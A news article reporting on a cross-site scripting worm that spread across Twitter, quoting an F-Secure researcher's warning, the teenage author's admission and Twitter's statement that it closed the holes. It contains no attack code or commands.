Just hours after Twitter began removing the first cross-site scripting vulnerability that hit its site this weekend, a new modified strain has been found, and according to F-Secure, it’s not the last one we’re likely to see over the next few days.
“This is not over. There’s going to be quite a few modified Twitter worms for a day or two. Be careful in Twitter, don’t view profiles, don’t follow links. It’s beautiful outside, maybe go for a walk instead?” Mikko said on the F-Secure blog earlier today.
According to Breaking News, Mikeyy Mooney, the 17 year-old owner of StalkDaily.com, has reportedly admitted responsibility for yesterday’s attack.
“I am the person who coded the XSS which then acted as a worm when it auto updated a users profile and status, which then infected other users who viewed their profile. I did this out of boredom, to be honest. I usually like to find vulnerabilities within websites and try not to cause too much damage, but start a worm or something to give the developers an insight on the problem and while doing so, promoting myself or my website.”
We wrote about StalkDaily yesterday, and last night Twitter pointed out on its status blog that it has “taken steps to remove the offending updates and to close the holes that allowed this ‘worm’ to spread.” The offending code can be found at GitHub as noted by Mr Speaker who left a message in our comments, and a postmortem of yesterday’s vulnerability can be found on the DCortesi blog.
Clearly Mikeyy is still bored as the new version is now making its way across the Twitterverse, tweeting comments such as: “Man, Twitter can’t fix shit. Mikeyy owns :)”
So if you see a tweet with the word Mikeyy – don’t click on it.
If you need to remove Mikeyy, Twittercism walks you through in six easy steps.
We’ll keep you updated as the day progresses.